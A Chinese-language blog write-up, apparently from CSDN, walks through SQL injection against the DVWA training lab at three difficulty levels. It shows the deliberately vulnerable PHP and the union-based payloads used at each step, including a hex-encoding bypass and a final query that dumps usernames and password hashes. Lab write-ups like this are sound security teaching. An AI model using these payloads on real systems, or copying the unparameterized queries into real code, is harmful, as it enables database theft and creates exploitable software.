DVWA ---SQL Injection

手工注入的一般步骤:

    1.判断是否存在注入,注入是字符型还是数字型

    2.猜解SQL查询语句中的字段数

    3.确定显示的字段顺序

    4.获取当前数据库

    5.获取数据库中的表

    6.获取表中的字段名

    7.下载数据

dvwa中的代码分析

Low

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?> 

可以看到代码没有对数据进行任何的过滤。

所以直接进行漏洞利用
1.判断是否存在注入,注入是字符型还是数字型
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

所以后台应用程序是将数据当作字符串处理。

2.猜解SQL查询语句中的字段数

输入1′ or 1=1 order by 数字 #
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

当数字为2时能正确显示,为3时提示错误,所以有两个字段。

3.确定显示的字段顺序

输入1′ union select 1,2 #
在这里插入图片描述

4.获取当前数据库

输入1′ union select 1,database() #
在这里插入图片描述

5.获取数据库中的表

输入1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
在这里插入图片描述

6.获取表中的字段名
输入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #
在这里插入图片描述
7.下载数据

输入1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
在这里插入图片描述

Medium

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Display values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    //mysql_close();
}

?> 

可以看到,Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此来控制用户的输入。
在这里插入图片描述

漏洞利用

使用burpsuite抓包改数据。
在这里插入图片描述
1.判断是否存在注入,注入是字符型还是数字型
在这里插入图片描述

所以可以判断是数字型注入。由于是数字型注入,服务器端的mysql_real_escape_string函数就形同虚设了,因为数字型注入并不需要借助引号。

2.猜解SQL查询语句中的字段数
更改参数id为1 order by 2 #
在这里插入图片描述

3.确定显示的字段顺序
更改参数id为1 union select 1,2#
在这里插入图片描述
4.获取当前数据库
更改参数id为1 union select 1,database() #
在这里插入图片描述
5.获取数据库中的表
更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
在这里插入图片描述

6.获取表中的字段名
数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#
在这里插入图片描述
查询失败,因为包含了单引号,单引号会被转义为\’。

可以利用16进制进行绕过,更改为
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #
在这里插入图片描述
7.下载数据
修改参数id为
1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
在这里插入图片描述

High

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?> 

虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。由于手工注入的过程与Low级别基本一样,直接最后一步演示下载数据。

输入1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值